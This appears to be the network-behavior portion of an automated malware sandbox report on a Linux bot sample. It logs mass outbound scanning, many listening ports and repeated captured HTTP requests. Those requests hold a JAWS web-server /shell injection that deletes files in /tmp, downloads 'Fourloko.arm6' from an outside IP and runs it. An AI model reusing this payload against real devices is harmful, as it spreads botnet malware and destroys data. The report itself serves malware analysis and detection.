        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.172.112.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.212.147.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 78.5.2.128:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 5.91.15.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 72.77.199.171:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 20.130.34.193:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 205.244.180.7:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.94.247.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 132.9.174.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.246.110.130:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 187.98.204.182:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.111.208.14:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.144.2.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 4.242.176.29:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 8.69.43.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 183.214.135.130:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 174.179.3.247:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.119.3.142:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 210.111.87.178:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 78.166.140.198:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.12.107.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.138.41.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 45.40.139.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 148.31.32.49:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 161.187.67.134:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 119.144.161.109:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 123.228.155.233:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 136.50.36.101:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 112.37.143.83:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 25.143.207.83:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 167.159.30.247:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.145.182.193:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.114.24.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 84.148.105.160:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.82.119.95:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 189.106.135.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 8.142.95.118:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 207.240.47.4:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 113.138.6.36:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.236.134.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 27.96.35.155:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.92.43.151:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 146.160.111.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 138.162.227.226:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 75.250.137.163:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 137.1.230.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 46.209.109.111:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.101.121.174:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.241.219.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 98.94.54.211:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 62.163.229.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 102.186.96.37:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 5.72.58.39:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.216.188.143:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 196.50.200.118:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 160.205.150.207:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.103.223.163:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 23.93.242.117:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 134.198.217.196:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 84.19.131.22:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.3.22.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 57.130.245.37:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.165.131.236:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 123.193.94.149:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.174.189.3:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 143.202.63.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.89.124.54:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 171.224.44.120:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 216.219.151.168:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 190.174.207.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 66.246.204.206:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.87.47.240:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 74.0.249.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.143.210.28:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.128.115.208:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 171.154.193.197:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 193.203.160.171:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 120.13.77.138:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.213.180.123:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.17.122.21:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 63.19.75.189:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.243.221.244:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 109.7.213.45:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 89.5.210.58:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 108.2.232.38:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.40.253.31:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.35.104.253:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.218.29.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.183.174.158:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 45.37.128.201:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 133.240.139.98:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.164.249.204:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 181.216.12.212:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 108.54.18.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 136.65.0.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 60.223.100.61:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 182.194.102.166:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.177.26.8:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 223.246.88.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.79.13.9:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 104.2.194.163:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 129.61.6.241:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 13.89.106.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 14.73.203.214:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 102.153.202.206:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.13.20.46:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 200.7.27.150:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 157.67.216.33:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 19.92.118.103:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 150.162.112.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 117.211.168.174:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 51.160.232.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 164.73.195.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 167.242.44.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.132.83.177:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 18.146.56.66:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 18.184.200.126:60001
        Source: /tmp/01oHMcUgUM (PID: 5263)Socket: 127.0.0.1::43829Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::23Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::0Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::80Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::60001Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8000Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::9000Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8080Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8081Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::53413Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::52869Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::37215Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::81Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8089Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8088Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8083Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::443Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::4444Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::8001Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::49152Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::40960Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::1024Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::1337Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5265)Socket: 0.0.0.0::420Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::0Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::80Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::60001Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8000Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::9000Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8080Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8081Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::53413Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::52869Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::37215Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::81Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8089Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8088Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8083Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::443Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::4444Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::8001Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::49152Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::40960Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::1024Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::1337Jump to behavior
        Source: /tmp/01oHMcUgUM (PID: 5271)Socket: 0.0.0.0::420Jump to behavior
        Source: /lib/systemd/systemd-journald (PID: 5305)Socket: <unknown socket type>:unknownJump to behavior
        Source: /usr/sbin/gdm3 (PID: 5500)Socket: <unknown socket type>:unknownJump to behavior
        Source: /usr/bin/dbus-daemon (PID: 5531)Socket: <unknown socket type>:unknownJump to behavior
        Source: /lib/systemd/systemd-journald (PID: 5568)Socket: <unknown socket type>:unknownJump to behavior
        Source: /lib/systemd/systemd-journald (PID: 5672)Socket: <unknown socket type>:unknownJump to behavior
        Source: /lib/systemd/systemd-journald (PID: 5768)Socket: <unknown socket type>:unknown
        Source: /usr/sbin/gdm3 (PID: 5770)Socket: <unknown socket type>:unknown
        Source: /lib/systemd/systemd-journald (PID: 5889)Socket: <unknown socket type>:unknown
        Source: /lib/systemd/systemd-journald (PID: 5992)Socket: <unknown socket type>:unknown
        Source: /usr/sbin/gdm3 (PID: 5993)Socket: <unknown socket type>:unknown
        Source: unknownNetwork traffic detected: HTTP traffic on port 35426 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 35426
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36630
        Source: unknownNetwork traffic detected: HTTP traffic on port 36626 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36624
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36626
        Source: unknownNetwork traffic detected: HTTP traffic on port 36630 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 36624 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 36628 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 36628
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownTCP traffic detected without corresponding DNS query: 4.81.245.225
        Source: unknownTCP traffic detected without corresponding DNS query: 82.36.132.225
        Source: unknownTCP traffic detected without corresponding DNS query: 160.32.42.58
        Source: unknownTCP traffic detected without corresponding DNS query: 200.170.27.226
        Source: unknownTCP traffic detected without corresponding DNS query: 203.183.35.174
        Source: unknownTCP traffic detected without corresponding DNS query: 34.186.231.233
        Source: unknownTCP traffic detected without corresponding DNS query: 47.49.163.86
        Source: unknownTCP traffic detected without corresponding DNS query: 2.127.230.162
        Source: unknownTCP traffic detected without corresponding DNS query: 94.159.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 200.165.134.110
        Source: unknownTCP traffic detected without corresponding DNS query: 63.46.196.25
        Source: unknownTCP traffic detected without corresponding DNS query: 117.105.22.91
        Source: unknownTCP traffic detected without corresponding DNS query: 150.248.5.202
        Source: unknownTCP traffic detected without corresponding DNS query: 98.238.3.115
        Source: unknownTCP traffic detected without corresponding DNS query: 135.179.24.145
        Source: unknownTCP traffic detected without corresponding DNS query: 219.143.235.62
        Source: unknownTCP traffic detected without corresponding DNS query: 39.162.242.90
        Source: unknownTCP traffic detected without corresponding DNS query: 18.103.180.113
        Source: unknownTCP traffic detected without corresponding DNS query: 183.105.113.214
        Source: unknownTCP traffic detected without corresponding DNS query: 1.192.146.209
        Source: unknownTCP traffic detected without corresponding DNS query: 197.199.160.250
        Source: unknownTCP traffic detected without corresponding DNS query: 201.38.104.82
        Source: unknownTCP traffic detected without corresponding DNS query: 62.159.25.135
        Source: unknownTCP traffic detected without corresponding DNS query: 106.130.225.37
        Source: unknownTCP traffic detected without corresponding DNS query: 58.247.133.170
        Source: unknownTCP traffic detected without corresponding DNS query: 122.27.140.123
        Source: unknownTCP traffic detected without corresponding DNS query: 13.77.219.228
        Source: unknownTCP traffic detected without corresponding DNS query: 222.37.249.9
        Source: unknownTCP traffic detected without corresponding DNS query: 135.44.160.116
        Source: unknownTCP traffic detected without corresponding DNS query: 61.213.96.210
        Source: unknownTCP traffic detected without corresponding DNS query: 12.164.223.77
        Source: unknownTCP traffic detected without corresponding DNS query: 175.97.216.210
        Source: unknownTCP traffic detected without corresponding DNS query: 37.189.230.148
        Source: unknownTCP traffic detected without corresponding DNS query: 118.2.232.218
        Source: unknownTCP traffic detected without corresponding DNS query: 153.236.105.188
        Source: unknownTCP traffic detected without corresponding DNS query: 186.59.14.222
        Source: unknownTCP traffic detected without corresponding DNS query: 70.230.240.106
        Source: unknownTCP traffic detected without corresponding DNS query: 130.58.76.84
        Source: unknownTCP traffic detected without corresponding DNS query: 59.172.158.55
        Source: unknownTCP traffic detected without corresponding DNS query: 149.85.150.54
        Source: unknownTCP traffic detected without corresponding DNS query: 12.187.135.99
        Source: unknownTCP traffic detected without corresponding DNS query: 78.107.7.30
        Source: unknownTCP traffic detected without corresponding DNS query: 101.132.235.139
        Source: unknownTCP traffic detected without corresponding DNS query: 135.92.140.170
        Source: unknownTCP traffic detected without corresponding DNS query: 213.36.37.8
        Source: unknownTCP traffic detected without corresponding DNS query: 72.124.43.19
        Source: unknownTCP traffic detected without corresponding DNS query: 189.5.32.117
        Source: unknownTCP traffic detected without corresponding DNS query: 97.121.36.249
        Source: unknownTCP traffic detected without corresponding DNS query: 117.183.35.142
        Source: unknownTCP traffic detected without corresponding DNS query: 86.29.182.227
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Aug 12 2019Content-Type: text/html; charset=UTF-8Content-length: 213
        Source: syslog.286.dr, syslog.67.dr, syslog.190.dr, syslog.234.dr, syslog.344.drString found in binary or memory: https://www.rsyslog.com
        Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
